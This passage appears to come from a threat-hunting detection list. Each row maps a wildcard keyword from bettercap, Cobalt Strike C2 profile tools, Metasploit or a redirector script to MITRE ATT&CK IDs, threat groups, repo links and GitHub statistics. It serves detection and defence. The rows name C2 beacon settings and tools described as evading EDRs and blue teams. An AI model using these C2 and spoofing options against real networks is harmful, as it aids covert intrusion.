802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*dns.spoof.domains*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*dns.spoof.hosts*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*dns_beacon_beacon*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_dns_idle*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_dns_sleep*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 
- T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_dns_stager_prepend*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_dns_stager_subhost*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_dns_ttl*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_get_A*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_get_TXT*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_maxdns*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_ns_response*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_put_metadata*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 
- T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_put_output*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_bruteforce.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*dns_redir.sh *,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,0,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*dns_spoof.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 
networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*dns_stager_prepend*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*dns_stager_prepend*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 
- T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*'dns_stager_prepend'*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda 
- Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*dns_stager_subhost*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*dns_stager_subhost*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*'dns_stager_subhost'*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z 
